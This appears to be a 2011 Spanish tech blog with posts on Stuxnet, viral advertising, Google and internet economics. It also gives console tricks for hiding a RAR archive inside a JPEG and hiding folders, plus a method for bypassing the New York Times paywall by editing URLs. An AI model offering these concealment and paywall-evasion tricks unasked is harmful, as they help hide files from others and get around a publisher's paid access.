"un prototipo funcional y aterrador de un arma cibernética que conducirá a la creación de una nueva carrera armamentística mundial"
El siguiente vídeo-infografía detalla la anatomía del que posiblemente sea uno de los virus más relevantes de la historia de la seguridad informática:

Stuxnet: Anatomy of a Computer Virus from Patrick Clair on Vimeo.

martes, 29 de noviembre de 2011

Video: animation vs animator Part I

Una pequeña animación salida de control, tan pronto es nombrada como "El Elegido" adquiere poderes especiales y empieza a atacar al programa en que fue creado e intentar destruir todo en el computador.
Empieza una batalla épica en pleno Escritorio para cazar a este "Elegido" que empieza a actuar más como un virus y destruir todo a su paso, se enfrenta al Messenger AIM, Photoshop y Firefox... destruye todo a su paso y nada puede detenerlo.
Solamente el antivirus Avast puede salvar el día, y capturarlo... se ha convertido en un simple Pop-u blocker para su dueño. Alguna vez se liberará de nuevo?

Video: Pelea de iconos en el Windows XP

Los iconos de la PC suelen ser criaturas muy conflictivas. Por un lado no podemos afirmar que esté netamente en su naturaleza pelear entre ellos, pero es comprensible que lo hagan ya que debe ser extremadamente aburrido ser un icono que está quieto todo el tiempo, esperando que la casualidad o la utilidad los llame a hacer su trabajo como puertos de activación hacia diferentes programas. Es por eso que cuando estan demasiado aburridos comienzan a atacarse entre ellos, a veces con resultados catastróficos. Pero lógicamente suponemos que no hay nada que el botón reset no pueda solucionar.
Vean esta excelente animación, hecha presuntamente por japoneses en el año 2002, que muestra a los iconos de un escritorio XP comenzar una ardua pelea entre ellos.
¿Los participantes? Internet Explorer, ICQ, Outlook, Paint, Mi PC y Norton Antivirus.

domingo, 27 de noviembre de 2011

Video: Como pasar Super Mario Bros en 5 minutos

He de admitir que en la época que jugaba al Super Mario Bros tardaba un montón de tiempo y un montón de continues para terminar este mítico juego. En 5 minutillos se ventila el juego como quién no quiere la cosa: Sin coger hongos para ponerse grande, sin perder ninguna vida…

Comercial Sony Bravia Paint

Los comerciales de la televisión Sony Bravia son un despliegue de colores, materiales y números. En 2005, tiraron 250 mil bolas coloridas por una avenida de San Francisco; en 2006, gastaron 70 mil litros de tinta en un edificio abandonado en Glasgow, durante 10 días de grabación, con un equipo de 250 personas.
Con esa idea el director Jonathan Glazer continua la campaña de Sony Color.like.no.other, para sus pantallas Bravia. Si antes fueron las calles de San Francisco el escenario elegido para filmar el primer comercial, ahora fue el turno de unos viejos edificios en Glasgow.
Lo más interesante, aquí no hay efectos especiales, solo producción y pirotecnia.
Para ver el video del comercial, pulsa play

Los 10 mejores ejemplos de Marketing Viral

En éste artículo analizaremos los 10 mejores ejemplos de Marketing Viral en televisión (según mi modesta opinión, claro). El Marketing Viral es una estrategia en general difíci de conseguir pero que suele proporcionar unos excelentes resultados y en ocasiones con un precio muy bajo.
Precisamente se llama marketing viral porque se extiende de unos a otros mediante el boca a boca. Hemos dejado algunos fuera porque no había vídeos de suficiente calidad. Esperamos que les guste el artículo.
1. BMW. Be Water My Friend.

En primera posición de viralidad no dudamos en incluir este anuncio protagonizado por Bruce Lee, estrella china de las artes marciales, que alcanzó en su muerte prematura la categoría de icono moderno. Lee era un personaje muy físico y enfatizaba perfectamente cada palabra, tenía un magnetismo especial que transmite en el anuncio. En mi oficina estuvimos recitando el Be water my friend durante meses… Por cierto que en el vídeo Bruce Lee no habla de nada que tenga que ver con un coche y apenas aparece durante unos segundos, pero el genio creativo de BMW es inconfundible. Recordemos también el bellísimo anuncio en que simplemente se ve un brazo jugando con el viento mientras conduce. ¿Te gusta conducir?.

2. Airtel. Hola soy Edu, Feliz Navidad.

No es exactamente uno de mis anuncios favoritos, y de hecho en su día era un tanto repetitivo. Sin embargo trata del primer ejemplo de marketing viral que recuerdo en España y en su día pegó muy fuerte. Durante unas navidades completas, cualquier felicitación navideña quedó sustituida por el consabido -Hola soy Edu, feliz Navidad. Los detractores del anuncio argumentaron en su día que si bien la venta de móviles se disparó aquellas Navidades y el anuncio era muy pegadizo, favorecía por igual a todos los competidores. De hecho, cuando me puse a redactar el artículo pensaba que el artículo era de Telefónica, cuando realmente era de Airtel.

3. Ikea. Esto no se toca.

Derroche de creatividad de la marca sueca, líder mundial en venta de muebles low-cost. Los lectores de Latinoamérica tal vez no conozcan la compañía, pero es difícil explicar el fenómeno social que representa en Europa. Cualquiera que haya ido con su pareja a comprar un Billy, un Vika, un Ektorpe, un Beddinge o un Grevbäkb conocen la experiencia IKEA. No se preocupen, son palabras suecas… El caso es que IKEA viene a ser un concepto de mega almacenes low cost de las empresas de hábitat y mobiliario. La imagen que impulsa en sus anuncios es la democratización de los muebles: asequibles, familiares y todo terreno. IKEA es es la libertad, la independencia y la democratización del hogar. Bienvenidos a la República Independiente de tu Casa. He puesto la versión larga porque merece la pena verla.

4. Budweiser. Wassup!.

Poco conocido en España, éste es posiblemente el mejor ejemplo de marketing viral en EEUU. Se trata simplemente de un grupo de amigos viendo un partido. Budweiser es la cerveza que te tomas con tus amigotes sin remordimientos ni preocupaciones, la cerveza de los tíos que son libres, que comen pizza, que ponen los pies encima de la mesa y que ven un partido. No aparece ni una sola mujer en el microcosmos de Budweiser. Budweiser es la cerveza americana… Wassup? Watching a game. Having a Bud… tan simple como nosotros =).

5. XBox. Cuidado con el Tiburón.

Como en el caso del anuncio de IKEA, cuando el tono de un anuncio suena en todos los teléfonos móviles, sin duda ha sido un ejemplo de bombazo viral de marketing. Éste anuncio de la Xbox hace una parodia de las canciones del verano estilo Georgie Dann que durante un par de meses asolan España como un huracán y resuenan en tu cabeza sin parar: letras simplonas y repetitivas, y melodías muy pegadizas. El éxito es total, aunque tampoco se fija muy bien el branding o la marca en el anuncio; bien podría ser el anuncio de un juego de Playstation y nadie notaría la diferencia.

6. Mapfre. Yo creía.

Otra melodía que se pega como un chicle en la suela de tu zapato, en éste caso de Mapfre, la primera aseguradora española y una de las primeras en América Latina. El anuncio tiene cuatro o cinco versiones que pueden visitar en www.yocreia.com, lo cual es un gran complemento para la televisión. La web de yocreia.com te permite descargar el tono para móvil y además si lo deseas puedes ponerlo como tono de espera para quien te llama (y de paso la empresa se queda con tu número de móvil). El vídeo a representa una escena tipo musical en una oficina, y el actor principal hace un papel soberbio.

7. Sony. She comes in colors.

No sé si se trata exactamente de un ejemplo de marketing viral (posiblemente no), pero he decidido incluirlo por la belleza cromática y por la ejecución del anuncio, muy pródigo en efectos especiales para la época en que apareció. Desafortunadamente, el vídeo en Youtube no tiene demasiada calidad. El anuncio promociona las televisiones Sony Bravia, marca que apenas aparece un segundo. En cualquier caso el anuncio sería reconocible por cualquiera años después. Les dejamos con el vídeo y la canción de los Rolling Stones, She Comes in Colors.

8. Movistar. Que idea.

Otra parodia de canción del verano, en éste caso de las canciones italianas tan populares de los 80. De la misma época que el traje que luce el protagonista, casi copiado del de Sony Crokett en la serie de Corrupción en Miami (Miami Vice). Un tipo simpático, algo canalla, barrigón y muy divertido. Todo para anunciarnos los planes de verano de Movistar.

9. MTV. Amo a Laura.

La reina de las campañas virales en Internet fue una anticampaña promovida desde la red. La llamamos así porque se hizo sin gastar ni un dólar en publicidad televisiva, y en la que no sale por ningún sitio el producto. MTV lanzó un grupo llamado “Los Happiness” que pertenecían a una asociación ficticia llamada “Asociación Nuevo Renacer”, los parodiaba como una juventud de derechas, ultracatólica y naïf , y así los promovió por toda la red. La banda sonó durante mucho tiempo en varios medios hasta que MTV reveló que ellos mismos habían creado el grupo (para darse a conocer en España, evidentemente).

10. Audi. Anuncio Superbowl.

Podríamos decir que el único elemento viral que tiene éste anuncio fue su estreno en la Spuerbowl, o lo que es lo mismo, el minuto de publicidad televisiva con mayor audiencia, con mayor cobertura nacional, y el más caro en todo Estados Unidos. Si les gusta la publicidad comparativa, éste es uno de los mejor hechos.
El protagonista del vídeo es nada menos que la estrella de películas de acción y tipo duro por excelencia Jason Statham. Se trata de una típica persecución en la que huye de dos matones; empieza con un Mercedes en los años 70, pero se hace con un coche muy antiguo y lo deja tirado en la calle (del segmento semi-lujo o lujo, Mercedes es la marca cuyo perfil suele ser el de gente mayor). Da un salto temporal hasta los 80, donde se hace con el BMW de un yuppie y acaba estrellándolo con un cartel de una mujer con el pelo estilo ochentero. Otro salto más y se encuentra en los 90 un Lexus, pero le parece tan malo que ni siquiera se sube. Por último se convierte en un tipo con clase y se hace con un Audi con el que acaba con sus perseguidores. Audi es coche del siglo XXI…

sábado, 26 de noviembre de 2011

viernes, 25 de noviembre de 2011

Ocultar cualquier archivo en un JPEG desde la consola

hola amigos como estan, aqui les traigo un pequeño manual para aquellos avidos de aprender mas, este pequeño truco les permitira ocultar cualquier archivo detras de una imagen JPEG con algunos comandos de consola y sin instalar ningun software. Es un truco muy facil y muy util si quieres enviar informacion secreta a algun amigo. OJO que esto es muy diferente de esteganografia, ya que aqui pueden ocultar texto detras de imagenes o textodetras de archivos mp3. Los que no conozcan acerca de esteganografia zambullanse un rato por la wiki :). Con este truco podran ocultar lo que ustedes deseen.
Lo que ustedes necesitan para este truco es
  • Tener instalado el WinRar
  • Tener conocimientos basicos de la linea de comandos
Pasos para ocultar cualquier archivo detras de imagenes JPEG manualmente
  1. Crean una carpeta dentro del Disco C (se recomienda que la creen con el nombre de Hidden).
  2. Ahora pongan todos los archivos que deseen ocultar en esta carpeta.
  3. Ahora todos estos archivos comprimanlos en un .rar usando winrar
    (por ejemplo AO.rar).
    OJO: Este archivo rar debe estar en la carpeta que crearon antes (C:\Hidden)
  4. Ahora seleccionen el archivo JPEG que quieren usar para ocultar el contenido rar (por ejemplo zero.jpg). Coloquen esta imagen en la misma ruta que el rar (C:\Hidden)
  5. Ahora abran la consola de comandos (Inicio-Ejecutar-escriban cmd). Abran el directorio C:\hiddendesde la consola
    (cuando abran la consola les aparecera algo asi C:\Documents and settings\username. Ahora escriban cd.. presionen ENTER y escriban otra vez cd.. y presionen enter. Ahora en la consola tendran algo asi C:\ . Ahora escriban cd "Hidden" y presionan enter.)
  6. Ahora escriban: “COPY /b zero.jpg + AO.rar outputimage.jpg” (without quotes)
  7. Ahora, zero.jpg es la imagen que van a utilizar, AO.rar es el archivo a ser oculto, y outputimage.jpg es el archivo que contiene ambos....
  8. Ahora, si haz hecho todo correctamente, veras un archivo outputimage.jpg en C:\hidden. Si lo abren con doble click veran la misma figura que el archivo zero.jpg. Pero si lo abren con WinRar, sorpresa!! ahi veran el archivo oculto...
Si desean aprender mas trucos como este no dejen de visitarme, no he tenido mucho tiempo pero prometo poner mas :)

Como puedo ocultar una carpeta utilizando la consola de comandos

Hola como estan, no he tenido mucho tiempo en estos dias de postear algun trukito, asi que voy a aprovechar este pequeño halo de tiempo para que aprendar a ocultar sus carpetas utilizando la consola de comandos lo cual es muy facil y sin instalar ningun programa.
**********Aqui tienen
Para esto empezare con una carpeta que pondre en el disco C (pueden experimentar aqui con una carpeta vacia antes de utilizar alguna carpeta importante), yo elegi una que tenia 3 instaladores y le puse Warez.

Ahora van a Inicio>Ejecutar>escriben cmd
en la consola les aparecera una ventana algo asi
para que vayan a la unidad raiz de este ejemplo(en este caso el Disk C), escriben cd.. hasta que se ubique en el C.
Una vez aqui escriben esta linea y dan ENTER
attrib +s +h warez

mas o menos se vera asi

OJO que warez es el nombre de mi carpeta de este tuto, ustedes escriban la carpeta que deseen ocultar y WALA!. Desaparecera de la vista de todos. Pero no temas si quieres que vuelva a aparecer haces lo inverso, a continuacion escribes esta linea, por si hayas cerrado la consola, vuelves a abrirla y te ubicas en la raiz donde esta tu carpeta sino no funcionara.
attrib -s -h warez

¿Google nos esta volviendo estupidos?

En una entrevista al sociólogo alemán Dirk Baecker, publicada recientemente aquí, se hace referencia a un ensayo del publicista norteamericano Nicholas Carr con el insinuante título “Is Google making us stupid?” El entrevistado contesta que en todo caso, “Google is making us smart”, para desarrollar luego el por qué. Sin embargo, no pude dejar de pensar en ese título, busqué el texto, y como me parece que no está demasiado difundido en la “red hispanoparlante”, lo reproduzco aquí.

El articulo hace referencia en su principio, a la desidia que trae Internet o el mundo digital a la hora de leer libros o textos largos.
Explica un poco como nuestro cerebro empieza a sobre-leer las cosas, es decir a no leer en profundidad. Yo he visto artículos relacionados a esto, en el cual relacionaban esto a las fuentes que permiten una lectura mas clara (aquí usando google translate en español). También he leído sobre el porque escribir las cosas en lápiz y de manera “cinética” ayuda mas a entender y recordar lo escrito, que haciéndolo por PC.
Me sucede lo que menciona, pero también me sucede lo contrario. Desde hace poco empece a juntar libros en PDF. Creo que he juntado alrededor de 60 libros, entre ellos las obras completas de Asimov, un par de cuentos de Borges y otras cosas.
No me costó mucho encontrarlos, estaban entre los primeros resultados de una búsqueda de Google (a esto iré mas adelante).
Ya me he leído 2 de estos libros, “Yo, Robot” y “Sueños de robots”. No me costo leerlos, no me costo seguirlos. No se si es un problema de la era digital, creo que es una cuestión de costumbre.
Es decir, uno se pasa el día en la PC y mientras navega por la web, por lo general lo hace buscando información, o lo hace buscando algún contenido en especifico. Nuestro cerebro hace un filtro de algún modo.
Cuando nos presentan una pagina web, realizamos un juicio sobre la pagina, si se ve bien o no. Si el contenido esta amontonado o muy separado. Buscamos donde está la información que vinimos a buscar o algún contenido que nos interese.
Metafóricamente hablando, somos como esos helicópteros de rescate, buscando náufragos en el mar, nos valemos solo de una luz para buscar.
Nuestro cerebro ya esta acostumbrado a guiarse por ciertas condiciones, esta acostumbrado a buscar por ciertas zonas y de cierta manera.
Así es como para saber el titulo de un blog, miramos para arriba buscando primero a la derecha un logo o un texto, y en caso de que no este a la izquierda, y si no es el caso ya nos desconcierta un poco.
Si el texto que buscamos no esta en el medio de la pagina, o en la primera columna (en caso de que tenga columnas), o no lo podemos ubicar, seguramente descartemos esa pagina.
Hay un montón de estudios e investigaciones sobre como trabajan los usuarios, los ojos y la mente a la hora de encontrar un contenido en paginas web.
Yo creo que al leer blogs o contenidos online, nos pasa lo mismo. La PC, el monitor en si, es un medio tan hostil para la concentración y para la vista, que tenemos la necesidad de realizar síntesis de lo que leemos.
De hacer que la lectura sea eficiente, que sea rápida. Si no estamos encontrando lo que buscamos, o lo que nos interesa, nuestro cerebro intentará irse. Ni hablar que con el mouse es mucho mas sencillo usar el scroll para saltearse párrafos o salir de allí, son cosas que aunque no lo crean condicionan al cerebro en hacer tales o cuales decisiones. Es cuestión de ponerle un “switch” a nuestro cerebro.
¿Inteligencia Artificial?
Si leen el articulo, verán que habla sobre la inteligencia artificial y como Google la aplica a todo lo que hace.
Y es así, Google posee gracias a su buscador, a sus herramienta de análisis de comportamiento en web (Analytics) y sus propias aplicaciones, y por sobretodo a la capacidad de poder almacenar y detectar los perfiles de los usuarios, un gran repositorio de datos con lo que pueden sacar estadísticas, hacer predicciones y filtrar mejor la información.
Yo soy un gran usuario de Google, trabajo en sistemas por lo cual dependo de él para buscar información. Como así decía antes y también lo dice el articulo, Google me conoce. Sabe que información brindarme. Si busco algo, lo encuentro como si supiera que necesito. Esto tiene sus ventajas y sus contras.
A veces no quiero estar trabajando con la misma información, quiero poder ver otras alternativas. Google al filtrarme la información me limita esta posibilidad (en realidad no la limita, pero la complica).
Creo que con la cantidad de información y des-información que hay en Internet, es importante contar con herramientas como estas. Sino, tendríamos que estar nosotros filtrando esta información, lo cual haría que nuestro cerebro filtre mucho mas la información que procesa, lo cual seguramente conlleve a un peor entendimiento de los textos.
Si en cambio, contáramos con una herramienta que nos diera exactamente lo que necesitamos, nuestro cerebro podría relajarse y trabajar con la información que tiene, en vez de estar filtrándola y juzgándola, eso nos llevaría a una mejor comprensión de la información online.
No es culpa de Google que nos volvamos estúpidos, aunque no creo que estúpidos sea la palabra, es que hay demasiada información y aun mas des-informacion dando vuelta alrededor. Que es muy difícil pedirle a nuestro cerebro que se concentre en una única fuente, sobretodo cuando sabemos que hay mucho mas allí afuera.

Como ver los contenidos del New York Times sin pagar

Tal parece que las grandes empresas aun no comprenden de lo que se trata el internet, y tratan de hacer de pago algo que no tiene sentido que lo sea.
Este es el caso de New York Times, uno de los diarios más importantes e influyentes del mundo dio un paso decisivo al convertir su versión online en accesible únicamente mediante suscripción de pago. Con lo que no contaban era con que su seguridad fuese tan robusta que bastasen tres segundos y cero conocimientos de hacker para saltarse el requisito previo de soltar dinero. Simplemente denle una mirada al video.



Tras leer 20 artículos en un mes aparece el aviso de que para continuar leyendo es necesario pasar por caja. Ahí es donde empezamos a buscar el “?” en la URL y procedemos al borrado.
Un agujero de seguridad bastante elemental y que no necesita ni de ingenio ni de tiempo para ser franqueado exitosamente. Este es uno mas de los intentos fallidos de este sitio por tratar de monetizar de una forma errónea sus contenidos.

jueves, 24 de noviembre de 2011

El Modelo de Negocio de Internet podría no ser sostenible para la economia

Cuando se habla de creación de empresas, de adaptación a la nueva era tecnológica, potenciar Startups para poder competir en el mercado, puede que muy pocos se hayan detenido a analizar la viabilidad del modelo de negocio de internet. Un modelo de negocio al que hay que subirse, pues como bien hemos comentado en cientos de ocasiones, una empresa creada en internet requiere de menos inversión, menos gastos y menos personal. Ahí radica el problema, pues a medio-largo plazo podríamos estar delante de un destructor de empleo en lugar de un generador de empleo.
Quizás a esa conclusión hemos llegado ésta mañana cuando estábamos analizando el tema "burbuja 2.0" y nos hemos encontrado que no estamos delante de una burbuja por valoración de empresas, pues a continuación veremos que la mayoría de éstas empresas valen lo que cuestan, sino que estamos poco a poco generando algo que yo no llamaría burbuja, aunque si la tecnología continúa avanzando a éste ritmo, la creación de empleo podría caer a niveles históricos en todo el mundo. Algunos no ven esto como algo perjudicial para la economía, pues estamos "cambiando la forma de hacer negocios" y viviendo un proceso de adaptación.
El problema más bien se enfoca en el modelo en sí. En internet, una empresa tiende a crecer muy rápido, de hecho, si no creces rápidamente eres superado, siempre y cuando tu idea de negocio sea buena. Existen decenas de empresas en Internet que tienen el beneficio de 5,000 empresas medianas con un 70% menos de personal del que necesitaría una empresa tradicional para facturar una décima parte.
Internet está entrando en la peligrosa zona del "todo gratis", financiándose con la publicidad de anunciantes. Quizás hayamos puesto nuestras miras en la piratería, cuando realmente la industria cinematográfica y musical es sólo la lanzadera del problema.
¿Qué ocurrirá cuando el servicio de video-llamadas esté totalmente integrado en una aplicación dentro de una red social? Se augura que dentro de un par de años, tanto los particulares como las empresas no tendrán necesidad de usar la llamada convencional. Esto podría provocar una considerable caída en el negocio de las compañías telefónicas, además de la caída en la facturación por mensajes que ya viven las compañías. Es decir, una aplicación que cuesta unos 100 millones de dólares, comprada por un gigante de internet, podría generar unas pérdidas de miles de millones anuales a las compañías telefónicas.
El ejemplo más visible de cómo avanza internet quizás lo tengamos en la banca, pues la banca podría mantener su facturación en España recortando 20,000 cabezas. La banca online ofrece mejores condiciones a los clientes, es más cómoda y está llena de descuentos en todo tipo de operaciones. El daño colateral es que no se necesita oficina y por tanto, no se requiere de empleados.
Podríamos aplicar ésta ecuación para cualquier producto o servicio que pueda venderse en la red, por lo que haciendo un cálculo aproximado (que debería confirmar un economista o analista profesional), continuando a éste ritmo, y suponiendo que el comercio online crezca un 20%, habríamos contribuido en un 3% al desempleo. Hablamos de comercio, y no de servicios por los que antes pagaban los consumidores y ahora se encuentran totalmente gratuitos en internet, ya que no se podría calcular la pérdida económica y mucho menos el empleo destruido, aunque podríamos añadir un 2% adicional siempre tirando a la baja.
Eso explicaría el por qué Estados Unidos ha tenido un ligero crecimiento económico a pesar de haber aumentado el desempleo. Estados Unidos no es una excepción.
Por poner un ejemplo. Imaginemos que Inditex cerrara todas las tiendas físicas en el mundo, despidiendo a los miles de trabajadores que hoy día tiene el grupo y quedándose únicamente con su tienda online. Pues bien, Inditex tendría una facturación aproximada de 743 millones de euros, cifra aproximada de facturación de la tienda online de Zara a menos de un año de creación. ¿Existen más de 150,000 tiendas de ropa únicamente en España con una facturación inferior a los 300,000 euros anuales que dan trabajo a más de 800,000 personas.
Inditex podría facturar aproximadamente la misma cantidad que 2,500 tiendas con tan sólo 20 empleados encargados de gestionar la tienda online. El colmo de los colmos en éste caso es que Inditex no pagaría impuestos en España, pues otra ventaja que tiene internet es elegir en qué país quieres facturar tus ventas. Inditex, concretamente, ha elegido Irlanda para facturar sus ventas online, pues de ésta forma se ahorra aproximadamente un 18% en impuestos.
En éste supuesto caso hipotético, Inditex no sólo destruiría miles de empleos directos e indirectos, sino que restaría comercio a España, contribuiría al desempleo y además el gobierno español no recibiría ni un euro por tales operaciones comerciales en territorio español. Aunque quería preguntar: ¿Conoces muchos comercios que facturen 700 millones anuales con tan sólo 20 empleados?
Evidentemente aún no tenemos un problema, ya que por ahora estamos adaptándonos al progreso, aunque no estaría de más que alguien analizara la viabilidad de éste modelo de negocio a 10 años en lo que a creación y destrucción de empleo se refiere.
No es que ésta mañana haya desayunado pesimismo ni que me haya levantado anti-progresista, es simplemente que hemos vuelto a hacer uso de las matemáticas y del sentido común, y como hemos expuesto en éste artículo, las cuentas no cuadran a largo plazo. Como de costumbre, aceptamos comentarios.

¿Burbuja 2.0?. Gráfico comparativo 1999-2011

Hacemos una comparativa de la situación de las compañías en Internet durante la década de los 90. Como podemos observar en el gráfico, la valoración conjunta de 25 compañías de 1999 es inferior a la valoración actual de tan sólo 5 compañías. Destacamos que en la comparativa no hemos incluido a Google, ya que bajo nuestro punto de vista, Google tiene un sistema de negocio actualmente diversificado, ya que ha entrado en la venta de soportes físicos, mecánica y energías renovables.


En 1999, más de 300 empresas salieron a bolsa durante la burbuja de las "puntocom". Según se dice, en aquel momento no era un sistema de negocio rentable ni viable en el tiempo, estando tales compañías sobre-valoradas. Se escuchan voces decir que esta vez es distinto, pues estas nuevas empresas tienen un sistema de negocio viable.
El problema que nosotros vemos, es que en el actual mercado es evidente que el negocio es viable, claro que no tiene por qué ser sostenible en el tiempo, al igual que preocupa el hecho de que una empresa como Groupon, la cual está perdiendo alrededor de 400 millones anuales, tenga una valoración de 3,400 millones de euros, siendo una valoración mucho mayor en los mercados secundarios.
Solo el tiempo dirá lo que sucederá con estas compañías, ya que, donde algunos analistas dicen que esta vez será distinto, nosotros pensamos que puede ser muy distinto, ya que ahora están más valoradas, tienen más trabajadores y más capital privado, por lo que en caso de estallido de burbuja, las consecuencias serían mucho peores para la economía y mercados.